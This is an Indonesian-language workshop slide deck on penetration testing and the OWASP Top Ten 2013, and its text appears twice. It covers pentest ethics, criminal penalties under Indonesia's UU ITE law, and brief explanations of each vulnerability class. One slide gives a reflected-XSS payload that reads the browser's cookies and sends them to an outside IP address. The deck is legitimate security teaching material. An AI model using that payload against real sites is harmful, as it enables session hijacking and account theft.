Workshop 101
Penetration testing & Vulnerability assessment
danang@hatsecure.com
Hat Secure | Workshop 101
Penetration testing
Hat Secure | Workshop 101
Penetration testing
– Wewenang sah
– Pengendalian kerusakan
– Tanggung jawab
– Lingkup kerja
– Masalah privasi
– Tugas untuk memperingatkan
Hat Secure | Workshop 101
UU ITE
Hat Secure | Workshop 101
Pasal 30
• Sengaja mengakses komputer atau sistem elektronik
tanpa ijin.
• Pidana 6 - 8 tahun
• Denda 600jt - 800jt
Hat Secure | Workshop 101
Pasal 32
• Sengaja dan tanpa ijin melakukan pemindahan,
perusakan dan membuka informasi rahasia.
• Pidana 8 - 10 tahun penjara
• Denda 2M - 5M
Hat Secure | Workshop 101
Pasal 33
• Sengaja dan tanpa ijin melakukan tindakan apapun
yang mengakibatkan sistem terganggu.
• Pidana 10 tahun
• Denda 10M
Hat Secure | Workshop 101
Pasal 35
• Sengaja dan tanpa ijin melakukan pemalsuan Dokumen
elektronik agar seolah-olah data yang otentik.
• Pidana 12 tahun penjara
• Denda 12 M
Hat Secure | Workshop 101
Hat Secure | Workshop 101
Penetration testing
• Scope
• Information gathering
• Target identification
• Target enumeration
• Vulnerability mapping
Hat Secure | Workshop 101
Penetration testing
• Exploitation
• Post Exploitation
• Social Engineering
Hat Secure | Workshop 101
The Open Web Application Security Project
(OWASP)
• Komunitas terbuka yang didedikasikan untuk
mengembangkan dan memelihara aplikasi yang dapat
dipercaya.
• Misi OWASP adalah untuk membuat perangkat lunak
keamanan.
• Lisensi Free Open Source.
Hat Secure | Workshop 101
OWASP Top Ten
2013
A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Known Vulnerable Components
A10 Unvalidated Redirects and Forwards
Hat Secure | Workshop 101
A1 - Injection
• Kelemahan injeksi terjadi ketika data yang tidak dipercaya
dikirim ke interpreter sebagai bagian dari suatu perintah atau
query.
• Serangan yang populer :
– Database Injection
– LDAP injection
– OS command injection
Hat Secure | Workshop 101
A2 - Broken Authentification and Session
Management
• Aplikasi yang berhubungan dengan otentikasi dan manajemen
sesi sering tidak diterapkan dengan benar.
Hat Secure | Workshop 101
SESSION FIXATION
Hat Secure | Workshop 101
A3 - Cross Site Scripting
• Kelemahan XSS terjadi ketika aplikasi mengambil data yang
tidak dipercaya dan mengirimkannya ke browser web tanpa
validasi yang tepat atau meloloskannya.
• Dibagi menjadi beberapa kategori, yang populer :
– XSS Reflected
– XSS Stored
Hat Secure | Workshop 101
XSS Reflected
<script>var tmp = document.cookie; document.write('<img
src="http://192.168.0.103/?'%2btmp%2b'"/>');</script>
Hat Secure | Workshop 101
A4 - Insecure Direct Object Reference
• Pengembang mengekspos referensi ke sebuah obyek
implementasi internal, seperti file, direktori, rekaman database,
atau kunci, melalui URL atau bentuk parameter.
• Populer :
– Relative Path Disclosure
– Full Path Disclosure
Hat Secure | Workshop 101
Full Path Disclosure
Hat Secure | Workshop 101
A5 - Security Misconfiguration
• Celah ini muncul akibat dari kesalahan konfigurasi keamanan.
• Populer :
– PHPMyadmin (tanpa password)
– Firewall = Off
– dan sebagainya
Hat Secure | Workshop 101
A6 - Sensitif Data Exposure
• Banyak aplikasi web tidak
melindungi data sensitif
– kartu kredit
– ID pajak
– otentifikasi yang tidak benar.
Hat Secure | Workshop 101
A7 - Missing Functional Access Control
• Sebagian besar aplikasi web memverifikasi tingkat hak akses
sebelum user interface terlihat.
• Kesalahan dari pengembang menyebabkan halaman web dapat
diakses tanpa memiliki hak akses.
Hat Secure | Workshop 101
A8 - Cross Site Request Forgery
• Celah keamanan pada aplikasi web
dengan cara mengeksploitasi suatu
task dari sebuah Web dengan
memanfaatkan Autentikasi yang
dimiliki oleh target.
Hat Secure | Workshop 101
A9 - Using Components with Known
Vulnerabilities
• Komponen, seperti library, framework, dan modul perangkat
lunak lain, hampir selalu berjalan dengan hak penuh.
• Jika komponen yang memiliki celah ini dimanfaatkan, serangan
seperti itu dapat menyebabkan kehilangan data yang serius
hingga server yang anda miliki diambil alih.
Hat Secure | Workshop 101
A10 - Unvalidated Redirects and Forwards
• Meneruskan pengguna ke halaman web lain tetapi tanpa
konfirmasi.
• Tanpa konfirmasi, user tidak sadar jika posisi terkini ada di web
lain.
Hat Secure | Workshop 101
Pentest Labs

Workshop 101 - Penetration testing & Vulnerability Assessment

  • 1.
    Workshop 101 Penetration testing& Vulnerability assessment danang@hatsecure.com
  • 2.
    Hat Secure |Workshop 101 Penetration testing
  • 3.
    Hat Secure |Workshop 101 Penetration testing – Wewenang sah – Pengendalian kerusakan – Tanggung jawab – Lingkup kerja – Masalah privasi – Tugas untuk memperingatkan
  • 4.
    Hat Secure |Workshop 101 UU ITE
  • 5.
    Hat Secure |Workshop 101 Pasal 30 • Sengaja mengakses komputer atau sistem elektronik tanpa ijin. • Pidana 6 - 8 tahun • Denda 600jt - 800jt
  • 6.
    Hat Secure |Workshop 101 Pasal 32 • Sengaja dan tanpa ijin melakukan pemindahan, perusakan dan membuka informasi rahasia. • Pidana 8 - 10 tahun penjara • Denda 2M - 5M
  • 7.
    Hat Secure |Workshop 101 Pasal 33 • Sengaja dan tanpa ijin melakukan tindakan apapun yang mengakibatkan sistem terganggu. • Pidana 10 tahun • Denda 10M
  • 8.
    Hat Secure |Workshop 101 Pasal 35 • Sengaja dan tanpa ijin melakukan pemalsuan Dokumen elektronik agar seolah-olah data yang otentik. • Pidana 12 tahun penjara • Denda 12 M
  • 9.
    Hat Secure |Workshop 101
  • 10.
    Hat Secure |Workshop 101 Penetration testing • Scope • Information gathering • Target identification • Target enumeration • Vulnerability mapping
  • 11.
    Hat Secure |Workshop 101 Penetration testing • Exploitation • Post Exploitation • Social Engineering
  • 12.
    Hat Secure |Workshop 101 The Open Web Application Security Project (OWASP) • Komunitas terbuka yang didedikasikan untuk mengembangkan dan memelihara aplikasi yang dapat dipercaya. • Misi OWASP adalah untuk membuat perangkat lunak keamanan. • Lisensi Free Open Source.
  • 13.
    Hat Secure |Workshop 101 OWASP Top Ten 2013 A1 Injection A2 Broken Authentication and Session Management A3 Cross-Site Scripting (XSS) A4 Insecure Direct Object References A5 Security Misconfiguration A6 Sensitive Data Exposure A7 Missing Function Level Access Control A8 Cross-Site Request Forgery (CSRF) A9 Using Known Vulnerable Components A10 Unvalidated Redirects and Forwards
  • 14.
    Hat Secure |Workshop 101 A1 - Injection • Kelemahan injeksi terjadi ketika data yang tidak dipercaya dikirim ke interpreter sebagai bagian dari suatu perintah atau query. • Serangan yang populer : – Database Injection – LDAP injection – OS command injection
  • 15.
    Hat Secure |Workshop 101 A2 - Broken Authentification and Session Management • Aplikasi yang berhubungan dengan otentikasi dan manajemen sesi sering tidak diterapkan dengan benar.
  • 16.
    Hat Secure |Workshop 101 SESSION FIXATION
  • 17.
    Hat Secure |Workshop 101 A3 - Cross Site Scripting • Kelemahan XSS terjadi ketika aplikasi mengambil data yang tidak dipercaya dan mengirimkannya ke browser web tanpa validasi yang tepat atau meloloskannya. • Dibagi menjadi beberapa kategori, yang populer : – XSS Reflected – XSS Stored
  • 18.
    Hat Secure |Workshop 101 XSS Reflected <script>var tmp = document.cookie; document.write('<img src="http://192.168.0.103/?'%2btmp%2b'"/>');</script>
  • 19.
    Hat Secure |Workshop 101 A4 - Insecure Direct Object Reference • Pengembang mengekspos referensi ke sebuah obyek implementasi internal, seperti file, direktori, rekaman database, atau kunci, melalui URL atau bentuk parameter. • Populer : – Relative Path Disclosure – Full Path Disclosure
  • 20.
    Hat Secure |Workshop 101 Full Path Disclosure
  • 21.
    Hat Secure |Workshop 101 A5 - Security Misconfiguration • Celah ini muncul akibat dari kesalahan konfigurasi keamanan. • Populer : – PHPMyadmin (tanpa password) – Firewall = Off – dan sebagainya
  • 22.
    Hat Secure |Workshop 101 A6 - Sensitif Data Exposure • Banyak aplikasi web tidak melindungi data sensitif – kartu kredit – ID pajak – otentifikasi yang tidak benar.
  • 23.
    Hat Secure |Workshop 101 A7 - Missing Functional Access Control • Sebagian besar aplikasi web memverifikasi tingkat hak akses sebelum user interface terlihat. • Kesalahan dari pengembang menyebabkan halaman web dapat diakses tanpa memiliki hak akses.
  • 24.
    Hat Secure |Workshop 101 A8 - Cross Site Request Forgery • Celah keamanan pada aplikasi web dengan cara mengeksploitasi suatu task dari sebuah Web dengan memanfaatkan Autentikasi yang dimiliki oleh target.
  • 25.
    Hat Secure |Workshop 101 A9 - Using Components with Known Vulnerabilities • Komponen, seperti library, framework, dan modul perangkat lunak lain, hampir selalu berjalan dengan hak penuh. • Jika komponen yang memiliki celah ini dimanfaatkan, serangan seperti itu dapat menyebabkan kehilangan data yang serius hingga server yang anda miliki diambil alih.
  • 26.
    Hat Secure |Workshop 101 A10 - Unvalidated Redirects and Forwards • Meneruskan pengguna ke halaman web lain tetapi tanpa konfirmasi. • Tanpa konfirmasi, user tidak sadar jika posisi terkini ada di web lain.
  • 27.
    Hat Secure |Workshop 101 Pentest Labs